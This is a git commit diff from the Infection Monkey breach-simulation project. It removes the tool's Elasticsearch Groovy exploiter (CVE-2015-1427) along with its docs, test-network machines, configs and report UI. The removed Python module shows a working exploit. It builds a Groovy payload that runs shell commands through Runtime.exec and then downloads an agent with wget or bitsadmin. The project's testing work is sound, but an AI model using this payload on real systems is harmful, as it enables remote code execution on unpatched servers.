forked from p15670423/monkey
Merge pull request #1744 from guardicore/1732-remove-elasticsearch
Remove ElasticGroovyExploiter
This commit is contained in:
commit
0a7637c944
|
@ -46,6 +46,7 @@ Changelog](https://keepachangelog.com/en/1.0.0/).
|
||||||
- Agent bootloader. #1676
|
- Agent bootloader. #1676
|
||||||
- Zero Trust integration with ScoutSuite. #1669
|
- Zero Trust integration with ScoutSuite. #1669
|
||||||
- ShellShock exploiter. #1733
|
- ShellShock exploiter. #1733
|
||||||
|
- ElasticGroovy exploiter. #1732
|
||||||
|
|
||||||
### Fixed
|
### Fixed
|
||||||
- A bug in network map page that caused delay of telemetry log loading. #1545
|
- A bug in network map page that caused delay of telemetry log loading. #1545
|
||||||
|
|
|
@ -47,7 +47,7 @@ The Infection Monkey uses the following techniques and exploits to propagate to
|
||||||
* SMB
|
* SMB
|
||||||
* WMI
|
* WMI
|
||||||
* Log4Shell
|
* Log4Shell
|
||||||
* Elastic Search (CVE-2015-1427)
|
* Zerologon
|
||||||
* Weblogic server
|
* Weblogic server
|
||||||
* and more, see our [Documentation hub](https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/) for more information about our RCE exploiters.
|
* and more, see our [Documentation hub](https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/) for more information about our RCE exploiters.
|
||||||
|
|
||||||
|
|
|
@ -1,13 +0,0 @@
|
||||||
---
|
|
||||||
title: "ElasticGroovy"
|
|
||||||
date: 2020-07-14T08:41:40+03:00
|
|
||||||
draft: false
|
|
||||||
tags: ["exploit", "windows", "linux"]
|
|
||||||
---
|
|
||||||
### Description
|
|
||||||
|
|
||||||
CVE-2015-1427
|
|
||||||
|
|
||||||
> The Groovy scripting engine in Elasticsearch before 1.3.8 and 1.4.x (before 1.4.3) allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script.
|
|
||||||
|
|
||||||
The logic is based on the [Metasploit module](https://github.com/rapid7/metasploit-framework/blob/12198a088132f047e0a86724bc5ebba92a73ac66/modules/exploits/multi/elasticsearch/search_groovy_script.rb).
|
|
|
@ -1,20 +0,0 @@
|
||||||
from copy import copy
|
|
||||||
|
|
||||||
from envs.monkey_zoo.blackbox.config_templates.base_template import BaseTemplate
|
|
||||||
from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemplate
|
|
||||||
|
|
||||||
|
|
||||||
class Elastic(ConfigTemplate):
|
|
||||||
|
|
||||||
config_values = copy(BaseTemplate.config_values)
|
|
||||||
|
|
||||||
config_values.update(
|
|
||||||
{
|
|
||||||
"basic.exploiters.exploiter_classes": ["ElasticGroovyExploiter"],
|
|
||||||
"internal.classes.finger_classes": ["PingScanner", "HTTPFinger", "ElasticFinger"],
|
|
||||||
"basic_network.scope.subnet_scan_list": ["10.2.2.4", "10.2.2.5"],
|
|
||||||
"basic_network.scope.depth": 1,
|
|
||||||
"internal.network.tcp_scanner.HTTP_PORTS": [9200],
|
|
||||||
"internal.network.tcp_scanner.tcp_target_ports": [],
|
|
||||||
}
|
|
||||||
)
|
|
|
@ -16,7 +16,6 @@ class Performance(ConfigTemplate):
|
||||||
"SmbExploiter",
|
"SmbExploiter",
|
||||||
"WmiExploiter",
|
"WmiExploiter",
|
||||||
"SSHExploiter",
|
"SSHExploiter",
|
||||||
"ElasticGroovyExploiter",
|
|
||||||
"Struts2Exploiter",
|
"Struts2Exploiter",
|
||||||
"WebLogicExploiter",
|
"WebLogicExploiter",
|
||||||
"HadoopExploiter",
|
"HadoopExploiter",
|
||||||
|
|
|
@ -2,8 +2,6 @@ GCP_TEST_MACHINE_LIST = {
|
||||||
"europe-west3-a": [
|
"europe-west3-a": [
|
||||||
"sshkeys-11",
|
"sshkeys-11",
|
||||||
"sshkeys-12",
|
"sshkeys-12",
|
||||||
"elastic-4",
|
|
||||||
"elastic-5",
|
|
||||||
"hadoop-2",
|
"hadoop-2",
|
||||||
"hadoop-3",
|
"hadoop-3",
|
||||||
"mssql-16",
|
"mssql-16",
|
||||||
|
|
|
@ -9,7 +9,6 @@ from envs.monkey_zoo.blackbox.analyzers.communication_analyzer import Communicat
|
||||||
from envs.monkey_zoo.blackbox.analyzers.zerologon_analyzer import ZerologonAnalyzer
|
from envs.monkey_zoo.blackbox.analyzers.zerologon_analyzer import ZerologonAnalyzer
|
||||||
from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemplate
|
from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemplate
|
||||||
from envs.monkey_zoo.blackbox.config_templates.drupal import Drupal
|
from envs.monkey_zoo.blackbox.config_templates.drupal import Drupal
|
||||||
from envs.monkey_zoo.blackbox.config_templates.elastic import Elastic
|
|
||||||
from envs.monkey_zoo.blackbox.config_templates.hadoop import Hadoop
|
from envs.monkey_zoo.blackbox.config_templates.hadoop import Hadoop
|
||||||
from envs.monkey_zoo.blackbox.config_templates.log4j_logstash import Log4jLogstash
|
from envs.monkey_zoo.blackbox.config_templates.log4j_logstash import Log4jLogstash
|
||||||
from envs.monkey_zoo.blackbox.config_templates.log4j_solr import Log4jSolr
|
from envs.monkey_zoo.blackbox.config_templates.log4j_solr import Log4jSolr
|
||||||
|
@ -190,9 +189,6 @@ class TestMonkeyBlackbox:
|
||||||
def test_drupal_exploiter(self, island_client):
|
def test_drupal_exploiter(self, island_client):
|
||||||
TestMonkeyBlackbox.run_exploitation_test(island_client, Drupal, "Drupal_exploiter")
|
TestMonkeyBlackbox.run_exploitation_test(island_client, Drupal, "Drupal_exploiter")
|
||||||
|
|
||||||
def test_elastic_exploiter(self, island_client):
|
|
||||||
TestMonkeyBlackbox.run_exploitation_test(island_client, Elastic, "Elastic_exploiter")
|
|
||||||
|
|
||||||
def test_struts_exploiter(self, island_client):
|
def test_struts_exploiter(self, island_client):
|
||||||
TestMonkeyBlackbox.run_exploitation_test(island_client, Struts2, "Struts2_exploiter")
|
TestMonkeyBlackbox.run_exploitation_test(island_client, Struts2, "Struts2_exploiter")
|
||||||
|
|
||||||
|
@ -256,7 +252,7 @@ class TestMonkeyBlackbox:
|
||||||
)
|
)
|
||||||
def test_report_generation_performance(self, island_client, quick_performance_tests):
|
def test_report_generation_performance(self, island_client, quick_performance_tests):
|
||||||
"""
|
"""
|
||||||
This test includes the SSH + Elastic + Hadoop + MSSQL machines all in one test
|
This test includes the SSH + Hadoop + MSSQL machines all in one test
|
||||||
for a total of 8 machines including the Monkey Island.
|
for a total of 8 machines including the Monkey Island.
|
||||||
|
|
||||||
Is has 2 analyzers - the regular one which checks all the Monkeys
|
Is has 2 analyzers - the regular one which checks all the Monkeys
|
||||||
|
|
|
@ -4,7 +4,6 @@ from typing import Type
|
||||||
|
|
||||||
from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemplate
|
from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemplate
|
||||||
from envs.monkey_zoo.blackbox.config_templates.drupal import Drupal
|
from envs.monkey_zoo.blackbox.config_templates.drupal import Drupal
|
||||||
from envs.monkey_zoo.blackbox.config_templates.elastic import Elastic
|
|
||||||
from envs.monkey_zoo.blackbox.config_templates.hadoop import Hadoop
|
from envs.monkey_zoo.blackbox.config_templates.hadoop import Hadoop
|
||||||
from envs.monkey_zoo.blackbox.config_templates.log4j_logstash import Log4jLogstash
|
from envs.monkey_zoo.blackbox.config_templates.log4j_logstash import Log4jLogstash
|
||||||
from envs.monkey_zoo.blackbox.config_templates.log4j_solr import Log4jSolr
|
from envs.monkey_zoo.blackbox.config_templates.log4j_solr import Log4jSolr
|
||||||
|
@ -39,7 +38,6 @@ island_client = MonkeyIslandClient(args.island_ip)
|
||||||
|
|
||||||
|
|
||||||
CONFIG_TEMPLATES = [
|
CONFIG_TEMPLATES = [
|
||||||
Elastic,
|
|
||||||
Hadoop,
|
Hadoop,
|
||||||
Mssql,
|
Mssql,
|
||||||
Performance,
|
Performance,
|
||||||
|
|
|
@ -9,8 +9,6 @@ This document describes Infection Monkey’s test network, how to deploy and use
|
||||||
[Machines](#machines)<br>
|
[Machines](#machines)<br>
|
||||||
[Nr. 2 Hadoop](#_Toc526517182)<br>
|
[Nr. 2 Hadoop](#_Toc526517182)<br>
|
||||||
[Nr. 3 Hadoop](#_Toc526517183)<br>
|
[Nr. 3 Hadoop](#_Toc526517183)<br>
|
||||||
[Nr. 4 Elastic](#_Toc526517184)<br>
|
|
||||||
[Nr. 5 Elastic](#_Toc526517185)<br>
|
|
||||||
[Nr. 9 Tunneling M1](#_Toc536021462)<br>
|
[Nr. 9 Tunneling M1](#_Toc536021462)<br>
|
||||||
[Nr. 10 Tunneling M2](#_Toc536021463)<br>
|
[Nr. 10 Tunneling M2](#_Toc536021463)<br>
|
||||||
[Nr. 11 SSH key steal](#_Toc526517190)<br>
|
[Nr. 11 SSH key steal](#_Toc526517190)<br>
|
||||||
|
@ -251,80 +249,6 @@ Update all requirements using deployment script:<br>
|
||||||
</tbody>
|
</tbody>
|
||||||
</table>
|
</table>
|
||||||
|
|
||||||
<table>
|
|
||||||
<thead>
|
|
||||||
<tr class="header">
|
|
||||||
<th><p><span id="_Toc526517184" class="anchor"></span>Nr. <strong>4</strong> Elastic</p>
|
|
||||||
<p>(10.2.2.4)</p></th>
|
|
||||||
<th>(Vulnerable)</th>
|
|
||||||
</tr>
|
|
||||||
</thead>
|
|
||||||
<tbody>
|
|
||||||
<tr class="odd">
|
|
||||||
<td>OS:</td>
|
|
||||||
<td><strong>Ubuntu 16.04.05 x64</strong></td>
|
|
||||||
</tr>
|
|
||||||
<tr class="even">
|
|
||||||
<td>Software:</td>
|
|
||||||
<td><p>JDK,</p>
|
|
||||||
<p><a href="https://www.elastic.co/downloads/past-releases/elasticsearch-1-4-2">Elastic 1.4.2</a></p></td>
|
|
||||||
</tr>
|
|
||||||
<tr class="odd">
|
|
||||||
<td>Default server’s port:</td>
|
|
||||||
<td>9200</td>
|
|
||||||
</tr>
|
|
||||||
<tr class="even">
|
|
||||||
<td>Server’s config:</td>
|
|
||||||
<td>Default</td>
|
|
||||||
</tr>
|
|
||||||
<tr class="odd">
|
|
||||||
<td>Scan results:</td>
|
|
||||||
<td>Machine exploited using Elastic exploiter</td>
|
|
||||||
</tr>
|
|
||||||
<tr class="even">
|
|
||||||
<td>Notes:</td>
|
|
||||||
<td><a href="https://www.elastic.co/guide/en/elasticsearch/reference/1.4/_index_and_query_a_document.html">Quick</a> tutorial on how to add entries (was useful when setting up).</td>
|
|
||||||
</tr>
|
|
||||||
</tbody>
|
|
||||||
</table>
|
|
||||||
|
|
||||||
<table>
|
|
||||||
<thead>
|
|
||||||
<tr class="header">
|
|
||||||
<th><p><span id="_Toc526517185" class="anchor"></span>Nr. <strong>5</strong> Elastic</p>
|
|
||||||
<p>(10.2.2.5)</p></th>
|
|
||||||
<th>(Vulnerable)</th>
|
|
||||||
</tr>
|
|
||||||
</thead>
|
|
||||||
<tbody>
|
|
||||||
<tr class="odd">
|
|
||||||
<td>OS:</td>
|
|
||||||
<td><strong>Windows 10 x64</strong></td>
|
|
||||||
</tr>
|
|
||||||
<tr class="even">
|
|
||||||
<td>Software:</td>
|
|
||||||
<td><p>JDK,</p>
|
|
||||||
<p><a href="https://www.elastic.co/downloads/past-releases/elasticsearch-1-4-2">Elastic 1.4.2</a></p></td>
|
|
||||||
</tr>
|
|
||||||
<tr class="odd">
|
|
||||||
<td>Default server’s port:</td>
|
|
||||||
<td>9200</td>
|
|
||||||
</tr>
|
|
||||||
<tr class="even">
|
|
||||||
<td>Server’s config:</td>
|
|
||||||
<td>Default</td>
|
|
||||||
</tr>
|
|
||||||
<tr class="odd">
|
|
||||||
<td>Scan results:</td>
|
|
||||||
<td>Machine exploited using Elastic exploiter</td>
|
|
||||||
</tr>
|
|
||||||
<tr class="even">
|
|
||||||
<td>Notes:</td>
|
|
||||||
<td><a href="https://www.elastic.co/guide/en/elasticsearch/reference/1.4/_index_and_query_a_document.html">Quick</a> tutorial on how to add entries (was useful when setting up).</td>
|
|
||||||
</tr>
|
|
||||||
</tbody>
|
|
||||||
</table>
|
|
||||||
|
|
||||||
<table>
|
<table>
|
||||||
<thead>
|
<thead>
|
||||||
<tr class="header">
|
<tr class="header">
|
||||||
|
|
|
@ -7,14 +7,6 @@ data "google_compute_image" "hadoop-3" {
|
||||||
name = "hadoop-3"
|
name = "hadoop-3"
|
||||||
project = local.monkeyzoo_project
|
project = local.monkeyzoo_project
|
||||||
}
|
}
|
||||||
data "google_compute_image" "elastic-4" {
|
|
||||||
name = "elastic-4"
|
|
||||||
project = local.monkeyzoo_project
|
|
||||||
}
|
|
||||||
data "google_compute_image" "elastic-5" {
|
|
||||||
name = "elastic-5"
|
|
||||||
project = local.monkeyzoo_project
|
|
||||||
}
|
|
||||||
data "google_compute_image" "tunneling-9" {
|
data "google_compute_image" "tunneling-9" {
|
||||||
name = "tunneling-9"
|
name = "tunneling-9"
|
||||||
project = local.monkeyzoo_project
|
project = local.monkeyzoo_project
|
||||||
|
|
|
@ -76,36 +76,6 @@ resource "google_compute_instance_from_template" "hadoop-3" {
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
resource "google_compute_instance_from_template" "elastic-4" {
|
|
||||||
name = "${local.resource_prefix}elastic-4"
|
|
||||||
source_instance_template = local.default_ubuntu
|
|
||||||
boot_disk{
|
|
||||||
initialize_params {
|
|
||||||
image = data.google_compute_image.elastic-4.self_link
|
|
||||||
}
|
|
||||||
auto_delete = true
|
|
||||||
}
|
|
||||||
network_interface {
|
|
||||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
|
||||||
network_ip="10.2.2.4"
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
resource "google_compute_instance_from_template" "elastic-5" {
|
|
||||||
name = "${local.resource_prefix}elastic-5"
|
|
||||||
source_instance_template = local.default_windows
|
|
||||||
boot_disk{
|
|
||||||
initialize_params {
|
|
||||||
image = data.google_compute_image.elastic-5.self_link
|
|
||||||
}
|
|
||||||
auto_delete = true
|
|
||||||
}
|
|
||||||
network_interface {
|
|
||||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
|
||||||
network_ip="10.2.2.5"
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
resource "google_compute_instance_from_template" "tunneling-9" {
|
resource "google_compute_instance_from_template" "tunneling-9" {
|
||||||
name = "${local.resource_prefix}tunneling-9"
|
name = "${local.resource_prefix}tunneling-9"
|
||||||
source_instance_template = local.default_ubuntu
|
source_instance_template = local.default_ubuntu
|
||||||
|
|
|
@ -27,7 +27,6 @@
|
||||||
"SSHExploiter",
|
"SSHExploiter",
|
||||||
"SmbExploiter",
|
"SmbExploiter",
|
||||||
"WmiExploiter",
|
"WmiExploiter",
|
||||||
"ElasticGroovyExploiter",
|
|
||||||
"Struts2Exploiter",
|
"Struts2Exploiter",
|
||||||
"WebLogicExploiter",
|
"WebLogicExploiter",
|
||||||
"HadoopExploiter",
|
"HadoopExploiter",
|
||||||
|
|
|
@ -1,114 +0,0 @@
|
||||||
"""
|
|
||||||
Implementation is based on elastic search groovy exploit by metasploit
|
|
||||||
https://github.com/rapid7/metasploit-framework/blob/12198a088132f047e0a86724bc5ebba92a73ac66
|
|
||||||
/modules/exploits/multi/elasticsearch/search_groovy_script.rb
|
|
||||||
Max vulnerable elasticsearch version is "1.4.2"
|
|
||||||
"""
|
|
||||||
|
|
||||||
import json
|
|
||||||
import logging
|
|
||||||
import re
|
|
||||||
|
|
||||||
import requests
|
|
||||||
|
|
||||||
from common.common_consts.network_consts import ES_SERVICE
|
|
||||||
from common.utils.attack_utils import BITS_UPLOAD_STRING, ScanStatus
|
|
||||||
from infection_monkey.exploit.web_rce import WebRCE
|
|
||||||
from infection_monkey.model import (
|
|
||||||
BITSADMIN_CMDLINE_HTTP,
|
|
||||||
CHECK_COMMAND,
|
|
||||||
CMD_PREFIX,
|
|
||||||
DOWNLOAD_TIMEOUT,
|
|
||||||
ID_STRING,
|
|
||||||
WGET_HTTP_UPLOAD,
|
|
||||||
)
|
|
||||||
from infection_monkey.network_scanning.elasticfinger import ES_PORT
|
|
||||||
from infection_monkey.telemetry.attack.t1197_telem import T1197Telem
|
|
||||||
|
|
||||||
logger = logging.getLogger(__name__)
|
|
||||||
|
|
||||||
|
|
||||||
class ElasticGroovyExploiter(WebRCE):
|
|
||||||
# attack URLs
|
|
||||||
MONKEY_RESULT_FIELD = "monkey_result"
|
|
||||||
GENERIC_QUERY = (
|
|
||||||
"""{"size":1, "script_fields":{"%s": {"script": "%%s"}}}""" % MONKEY_RESULT_FIELD
|
|
||||||
)
|
|
||||||
JAVA_CMD = GENERIC_QUERY % (
|
|
||||||
"""java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec("""
|
|
||||||
"""\\"%s\\").getText()"""
|
|
||||||
)
|
|
||||||
|
|
||||||
_TARGET_OS_TYPE = ["linux", "windows"]
|
|
||||||
_EXPLOITED_SERVICE = "Elastic search"
|
|
||||||
|
|
||||||
def __init__(self, host):
|
|
||||||
super(ElasticGroovyExploiter, self).__init__(host)
|
|
||||||
|
|
||||||
def get_exploit_config(self):
|
|
||||||
exploit_config = super(ElasticGroovyExploiter, self).get_exploit_config()
|
|
||||||
exploit_config["dropper"] = True
|
|
||||||
exploit_config["url_extensions"] = ["_search?pretty"]
|
|
||||||
exploit_config["upload_commands"] = {
|
|
||||||
"linux": WGET_HTTP_UPLOAD,
|
|
||||||
"windows": CMD_PREFIX + " " + BITSADMIN_CMDLINE_HTTP,
|
|
||||||
}
|
|
||||||
return exploit_config
|
|
||||||
|
|
||||||
def get_open_service_ports(self, port_list, names):
|
|
||||||
# We must append elastic port we get from elastic fingerprint module because It's not
|
|
||||||
# marked as 'http' service
|
|
||||||
valid_ports = WebRCE.get_open_service_ports(self.host, port_list, names)
|
|
||||||
if ES_SERVICE in self.host.services:
|
|
||||||
valid_ports.append([ES_PORT, False])
|
|
||||||
return valid_ports
|
|
||||||
|
|
||||||
def exploit(self, url, command):
|
|
||||||
command = re.sub(r"\\", r"\\\\\\\\", command)
|
|
||||||
payload = self.JAVA_CMD % command
|
|
||||||
try:
|
|
||||||
response = requests.get(url, data=payload, timeout=DOWNLOAD_TIMEOUT)
|
|
||||||
except requests.ReadTimeout:
|
|
||||||
logger.error(
|
|
||||||
"Elastic couldn't upload monkey, because server didn't respond to upload "
|
|
||||||
"request."
|
|
||||||
)
|
|
||||||
return False
|
|
||||||
result = self.get_results(response)
|
|
||||||
if not result:
|
|
||||||
return False
|
|
||||||
return result[0]
|
|
||||||
|
|
||||||
def upload_monkey(self, url, commands=None):
|
|
||||||
result = super(ElasticGroovyExploiter, self).upload_monkey(url, commands)
|
|
||||||
if "windows" in self.host.os["type"] and result:
|
|
||||||
T1197Telem(ScanStatus.USED, self.host, BITS_UPLOAD_STRING).send()
|
|
||||||
return result
|
|
||||||
|
|
||||||
def get_results(self, response):
|
|
||||||
"""
|
|
||||||
Extracts the result data from our attack
|
|
||||||
:return: List of data fields or None
|
|
||||||
"""
|
|
||||||
try:
|
|
||||||
json_resp = json.loads(response.text)
|
|
||||||
return json_resp["hits"]["hits"][0]["fields"][self.MONKEY_RESULT_FIELD]
|
|
||||||
except (KeyError, IndexError):
|
|
||||||
return None
|
|
||||||
|
|
||||||
def check_if_exploitable(self, url):
|
|
||||||
# Overridden web_rce method that adds CMD prefix for windows command
|
|
||||||
try:
|
|
||||||
if "windows" in self.host.os["type"]:
|
|
||||||
resp = self.exploit(url, CMD_PREFIX + " " + CHECK_COMMAND)
|
|
||||||
else:
|
|
||||||
resp = self.exploit(url, CHECK_COMMAND)
|
|
||||||
if resp is True:
|
|
||||||
return True
|
|
||||||
elif resp is not False and ID_STRING in resp:
|
|
||||||
return True
|
|
||||||
else:
|
|
||||||
return False
|
|
||||||
except Exception as e:
|
|
||||||
logger.error("Host's exploitability check failed due to: %s" % e)
|
|
||||||
return False
|
|
|
@ -18,7 +18,6 @@ BASIC = {
|
||||||
"WmiExploiter",
|
"WmiExploiter",
|
||||||
"SSHExploiter",
|
"SSHExploiter",
|
||||||
"Log4ShellExploiter",
|
"Log4ShellExploiter",
|
||||||
"ElasticGroovyExploiter",
|
|
||||||
"Struts2Exploiter",
|
"Struts2Exploiter",
|
||||||
"WebLogicExploiter",
|
"WebLogicExploiter",
|
||||||
"HadoopExploiter",
|
"HadoopExploiter",
|
||||||
|
|
|
@ -53,15 +53,6 @@ EXPLOITER_CLASSES = {
|
||||||
"link": "https://www.guardicore.com/infectionmonkey/docs/reference"
|
"link": "https://www.guardicore.com/infectionmonkey/docs/reference"
|
||||||
"/exploiters/sshexec/",
|
"/exploiters/sshexec/",
|
||||||
},
|
},
|
||||||
{
|
|
||||||
"type": "string",
|
|
||||||
"enum": ["ElasticGroovyExploiter"],
|
|
||||||
"title": "ElasticGroovy Exploiter",
|
|
||||||
"safe": True,
|
|
||||||
"info": "CVE-2015-1427. Logic is based on Metasploit module.",
|
|
||||||
"link": "https://www.guardicore.com/infectionmonkey/docs/reference/exploiters"
|
|
||||||
"/elasticgroovy/",
|
|
||||||
},
|
|
||||||
{
|
{
|
||||||
"type": "string",
|
"type": "string",
|
||||||
"enum": ["Struts2Exploiter"],
|
"enum": ["Struts2Exploiter"],
|
||||||
|
|
|
@ -69,7 +69,6 @@ class AWSExporter(Exporter):
|
||||||
CredentialType.KEY.value: AWSExporter._handle_ssh_key_issue,
|
CredentialType.KEY.value: AWSExporter._handle_ssh_key_issue,
|
||||||
},
|
},
|
||||||
"tunnel": AWSExporter._handle_tunnel_issue,
|
"tunnel": AWSExporter._handle_tunnel_issue,
|
||||||
ExploiterDescriptorEnum.ELASTIC.value.class_name: AWSExporter._handle_elastic_issue,
|
|
||||||
ExploiterDescriptorEnum.SMB.value.class_name: {
|
ExploiterDescriptorEnum.SMB.value.class_name: {
|
||||||
CredentialType.PASSWORD.value: AWSExporter._handle_smb_password_issue,
|
CredentialType.PASSWORD.value: AWSExporter._handle_smb_password_issue,
|
||||||
CredentialType.HASH.value: AWSExporter._handle_smb_pth_issue,
|
CredentialType.HASH.value: AWSExporter._handle_smb_pth_issue,
|
||||||
|
@ -245,21 +244,6 @@ class AWSExporter(Exporter):
|
||||||
instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
|
instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
|
||||||
)
|
)
|
||||||
|
|
||||||
@staticmethod
|
|
||||||
def _handle_elastic_issue(issue, instance_arn):
|
|
||||||
|
|
||||||
return AWSExporter._build_generic_finding(
|
|
||||||
severity=10,
|
|
||||||
title="Elastic Search servers are vulnerable to CVE-2015-1427",
|
|
||||||
description="Update your Elastic Search server to version 1.4.3 and up.",
|
|
||||||
recommendation="The machine {0}({1}) is vulnerable to an Elastic Groovy attack. "
|
|
||||||
"The attack was made "
|
|
||||||
"possible because the Elastic Search server was not patched "
|
|
||||||
"against CVE-2015-1427.".format(issue["machine"], issue["ip_address"]),
|
|
||||||
instance_arn=instance_arn,
|
|
||||||
instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
|
|
||||||
)
|
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def _handle_island_cross_segment_issue(issue, instance_arn):
|
def _handle_island_cross_segment_issue(issue, instance_arn):
|
||||||
|
|
||||||
|
|
|
@ -28,9 +28,6 @@ class ExploiterDescriptorEnum(Enum):
|
||||||
SMB = ExploiterDescriptor("SmbExploiter", "SMB Exploiter", CredExploitProcessor)
|
SMB = ExploiterDescriptor("SmbExploiter", "SMB Exploiter", CredExploitProcessor)
|
||||||
WMI = ExploiterDescriptor("WmiExploiter", "WMI Exploiter", CredExploitProcessor)
|
WMI = ExploiterDescriptor("WmiExploiter", "WMI Exploiter", CredExploitProcessor)
|
||||||
SSH = ExploiterDescriptor("SSHExploiter", "SSH Exploiter", CredExploitProcessor)
|
SSH = ExploiterDescriptor("SSHExploiter", "SSH Exploiter", CredExploitProcessor)
|
||||||
ELASTIC = ExploiterDescriptor(
|
|
||||||
"ElasticGroovyExploiter", "Elastic Groovy Exploiter", ExploitProcessor
|
|
||||||
)
|
|
||||||
STRUTS2 = ExploiterDescriptor("Struts2Exploiter", "Struts2 Exploiter", ExploitProcessor)
|
STRUTS2 = ExploiterDescriptor("Struts2Exploiter", "Struts2 Exploiter", ExploitProcessor)
|
||||||
WEBLOGIC = ExploiterDescriptor(
|
WEBLOGIC = ExploiterDescriptor(
|
||||||
"WebLogicExploiter", "Oracle WebLogic Exploiter", ExploitProcessor
|
"WebLogicExploiter", "Oracle WebLogic Exploiter", ExploitProcessor
|
||||||
|
|
|
@ -27,7 +27,6 @@ import {mssqlIssueOverview, mssqlIssueReport} from './security/issues/MssqlIssue
|
||||||
import {drupalIssueOverview, drupalIssueReport} from './security/issues/DrupalIssue';
|
import {drupalIssueOverview, drupalIssueReport} from './security/issues/DrupalIssue';
|
||||||
import {wmiPasswordIssueReport, wmiPthIssueReport} from './security/issues/WmiIssue';
|
import {wmiPasswordIssueReport, wmiPthIssueReport} from './security/issues/WmiIssue';
|
||||||
import {sshKeysReport, shhIssueReport, sshIssueOverview} from './security/issues/SshIssue';
|
import {sshKeysReport, shhIssueReport, sshIssueOverview} from './security/issues/SshIssue';
|
||||||
import {elasticIssueOverview, elasticIssueReport} from './security/issues/ElasticIssue';
|
|
||||||
import {log4shellIssueOverview, log4shellIssueReport} from './security/issues/Log4ShellIssue';
|
import {log4shellIssueOverview, log4shellIssueReport} from './security/issues/Log4ShellIssue';
|
||||||
import {
|
import {
|
||||||
crossSegmentIssueOverview,
|
crossSegmentIssueOverview,
|
||||||
|
@ -119,11 +118,6 @@ class ReportPageComponent extends AuthComponent {
|
||||||
},
|
},
|
||||||
[this.issueContentTypes.TYPE]: this.issueTypes.DANGER
|
[this.issueContentTypes.TYPE]: this.issueTypes.DANGER
|
||||||
},
|
},
|
||||||
'ElasticGroovyExploiter': {
|
|
||||||
[this.issueContentTypes.OVERVIEW]: elasticIssueOverview,
|
|
||||||
[this.issueContentTypes.REPORT]: elasticIssueReport,
|
|
||||||
[this.issueContentTypes.TYPE]: this.issueTypes.DANGER
|
|
||||||
},
|
|
||||||
'PowerShellExploiter': {
|
'PowerShellExploiter': {
|
||||||
[this.issueContentTypes.OVERVIEW]: powershellIssueOverview,
|
[this.issueContentTypes.OVERVIEW]: powershellIssueOverview,
|
||||||
[this.issueContentTypes.REPORT]: powershellIssueReport,
|
[this.issueContentTypes.REPORT]: powershellIssueReport,
|
||||||
|
|
|
@ -1,23 +0,0 @@
|
||||||
import React from 'react';
|
|
||||||
import CollapsibleWellComponent from '../CollapsibleWell';
|
|
||||||
|
|
||||||
export function elasticIssueOverview() {
|
|
||||||
return (<li>Elasticsearch servers are vulnerable to <a
|
|
||||||
href="https://www.cvedetails.com/cve/cve-2015-1427">CVE-2015-1427</a>.
|
|
||||||
</li>)
|
|
||||||
}
|
|
||||||
|
|
||||||
export function elasticIssueReport(issue) {
|
|
||||||
return (
|
|
||||||
<>
|
|
||||||
Update your Elastic Search server to version 1.4.3 and up.
|
|
||||||
<CollapsibleWellComponent>
|
|
||||||
The machine <span className="badge badge-primary">{issue.machine}</span> (<span
|
|
||||||
className="badge badge-info" style={{margin: '2px'}}>{issue.ip_address}</span>) is vulnerable to an <span
|
|
||||||
className="badge badge-danger">Elastic Groovy</span> attack.
|
|
||||||
<br/>
|
|
||||||
The attack was made possible because the Elastic Search server was not patched against CVE-2015-1427.
|
|
||||||
</CollapsibleWellComponent>
|
|
||||||
</>
|
|
||||||
);
|
|
||||||
}
|
|
|
@ -54,7 +54,6 @@
|
||||||
],
|
],
|
||||||
"vulnerability": [
|
"vulnerability": [
|
||||||
{"name": "DrupalExploiter"},
|
{"name": "DrupalExploiter"},
|
||||||
{"name": "ElasticGroovyExploiter"},
|
|
||||||
{"name": "HadoopExploiter"},
|
{"name": "HadoopExploiter"},
|
||||||
{"name": "ShellShockExploiter"},
|
{"name": "ShellShockExploiter"},
|
||||||
{"name": "Struts2Exploiter"},
|
{"name": "Struts2Exploiter"},
|
||||||
|
|
|
@ -52,7 +52,6 @@
|
||||||
"SmbExploiter",
|
"SmbExploiter",
|
||||||
"WmiExploiter",
|
"WmiExploiter",
|
||||||
"SSHExploiter",
|
"SSHExploiter",
|
||||||
"ElasticGroovyExploiter",
|
|
||||||
"Struts2Exploiter",
|
"Struts2Exploiter",
|
||||||
"ZerologonExploiter",
|
"ZerologonExploiter",
|
||||||
"WebLogicExploiter",
|
"WebLogicExploiter",
|
||||||
|
|
|
@ -5,7 +5,6 @@
|
||||||
"SmbExploiter",
|
"SmbExploiter",
|
||||||
"WmiExploiter",
|
"WmiExploiter",
|
||||||
"SSHExploiter",
|
"SSHExploiter",
|
||||||
"ElasticGroovyExploiter",
|
|
||||||
"Struts2Exploiter",
|
"Struts2Exploiter",
|
||||||
"WebLogicExploiter",
|
"WebLogicExploiter",
|
||||||
"HadoopExploiter",
|
"HadoopExploiter",
|
||||||
|
|
|
@ -27,9 +27,9 @@ SCAN_DATA_MOCK = [
|
||||||
EXPLOIT_DATA_MOCK = [
|
EXPLOIT_DATA_MOCK = [
|
||||||
{
|
{
|
||||||
"result": True,
|
"result": True,
|
||||||
"exploiter": "ElasticGroovyExploiter",
|
"exploiter": "ZerologonExploiter",
|
||||||
"info": {
|
"info": {
|
||||||
"display_name": "Elastic search",
|
"display_name": "Zerologon",
|
||||||
"started": "2020-05-11T08:59:38.105Z",
|
"started": "2020-05-11T08:59:38.105Z",
|
||||||
"finished": "2020-05-11T08:59:38.106Z",
|
"finished": "2020-05-11T08:59:38.106Z",
|
||||||
"vulnerable_urls": [],
|
"vulnerable_urls": [],
|
||||||
|
|
